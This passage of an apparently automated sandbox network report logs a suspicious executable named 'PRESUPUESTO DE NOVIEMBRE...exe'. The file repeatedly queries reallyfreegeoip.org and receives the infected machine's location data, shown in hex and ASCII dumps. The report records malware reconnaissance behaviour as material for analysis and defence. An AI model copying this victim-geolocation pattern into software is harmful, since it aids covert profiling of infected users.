{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ue1DcCJGQZ9Z6Ph3vROyXXzsxOjt%2BDg5uVliNVx701L%2BBaLxeQ8LTw3L24OGtWPXwUCUg9ncHlnNPtyqHSGNUL2TRA1jSUIVuO%2FiBT2KZrWtaPG767%2BibBv9PdawKHJfRnI4pUGc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2a77fafcf28e0-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1516&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1875647&cwnd=251&unsent_bytes=0&cid=41d0111fc41e61af&ts=157&x=0"
2024-10-31 09:35:19 UTC	151	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>
2024-10-31 09:35:19 UTC	208	IN	Data Raw: 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49792	188.114.97.3	443	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:35:20 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 09:35:20 UTC	1222	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:20 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4195 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NuDu9sRDtnpkZgxcpd%2Fm4d0MMMul0h5xoFLo5ryZKLA9Tpc5%2B29%2Fd70OBDKDH1F0S%2FYDCNvwK8yMcbOb%2F0Fp42gaEPVnlAbOjPShWgYklChGCANrYBF0im30aweWAnjZ%2BJpUSECA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2a789fcf26c0a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1235&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2255451&cwnd=250&unsent_bytes=0&cid=b7fddb010591c1d2&ts=148&x=0"
2024-10-31 09:35:20 UTC	147	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionN
2024-10-31 09:35:20 UTC	212	IN	Data Raw: 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: ame>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.11	49809	188.114.97.3	443	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:35:23 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 09:35:23 UTC	1224	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:23 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4198 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FV3kysiQ0rLBip8k79SOYuciG22ed8x%2BYKNwUzCa%2Fnz8bYO%2B6q%2B0d3kXq4wnv3rNjheTA80B1SfUXBpEU1bojK9uQi8G2fWeY6dMx09cg5yGIVlKEVmW%2FsS4HWa2gX%2BxToeHIB3e"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2a79a5f2ce70a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2359&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1187371&cwnd=243&unsent_bytes=0&cid=f7523cbd232a5d28&ts=145&x=0"
2024-10-31 09:35:23 UTC	145	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Regio
2024-10-31 09:35:23 UTC	214	IN	Data Raw: 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: nName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.11	49819	188.114.97.3	443	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:35:24 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 09:35:24 UTC	1226	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:24 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4199 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=41IP4CpINih8yTEISEyeXU9AJKV7XuQqgCbCGu81%2F4XPu8%2F%2BriI7SA7%2FYEkPV%2FdWOGojt%2FLtKKGbq6kEdUNxYCKMljPYi6B0dYsHbZ2BRt%2BPTKyI8ZmsOhgX%2FT8Dcmq4Uk0lEXu5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2a7a46a5f2e7f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1497&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1889106&cwnd=233&unsent_bytes=0&cid=d896b1814bc936fc&ts=149&x=0"
2024-10-31 09:35:24 UTC	143	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Reg
2024-10-31 09:35:24 UTC	216	IN	Data Raw: 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: ionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.11	49828	188.114.97.3	443	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:35:26 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 09:35:26 UTC	1210	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:26 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4201 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0E1zVuEL8jEimWXBOsjbobOSnecHvPLXeIl1zunUSZfAb5ZQhq4AUmBfcdWckiASo5CZpQJipKHVcvPev4OakLCaLfSRtCKoQbsu7Wn7eTqMAXUWoSnjov61kWqWNZ34SZZUqDYE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2a7aebb2f4869-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1095&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2637522&cwnd=251&unsent_bytes=0&cid=62e2bb1ee9bfaba2&ts=147&x=0"
2024-10-31 09:35:26 UTC	159	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</R
2024-10-31 09:35:26 UTC	200	IN	Data Raw: 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: egionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.11	49850	188.114.97.3	443	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:35:30 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 09:35:30 UTC	1214	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:30 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4205 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9OCTszw%2FpNV2kLFhIDX9WtRBKJ7Q8w8PPNo6iqPiWNHjYBM0wEex%2BdmOjjTGYUnwDmfub2wvNx876XoC4RL4UGhOYht9UoeUYnD37J9X4QF45CUebRVO4CG75HJVo6F4aXoc7gWZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2a7c58c50486a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1052&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2704014&cwnd=251&unsent_bytes=0&cid=98eca8e108a71aef&ts=149&x=0"
2024-10-31 09:35:30 UTC	155	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texa
2024-10-31 09:35:30 UTC	204	IN	Data Raw: 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: s</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.11	49861	188.114.97.3	443	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:35:31 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 09:35:31 UTC	1220	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:31 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4206 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qtLqXuCXGUdslAoOANXD%2FZt9689y1KzeNOWu9jfpqlmRvnQ8Q2yBwEUL%2FxBmEfbQflapGn2RoQIVuIpYZd8%2BszIiV%2Fg0qEYpZ1NpLSj40KkJnnTS7TkITLoUdY%2FlDAMYehEsJpGj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2a7d07906eaf2-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1086&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2632727&cwnd=250&unsent_bytes=0&cid=6afb20382d400c69&ts=204&x=0"
2024-10-31 09:35:31 UTC	149	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNam
2024-10-31 09:35:31 UTC	210	IN	Data Raw: 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: e>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.11	49871	188.114.97.3	443	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:35:33 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 09:35:33 UTC	1222	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:35:33 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4208 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: 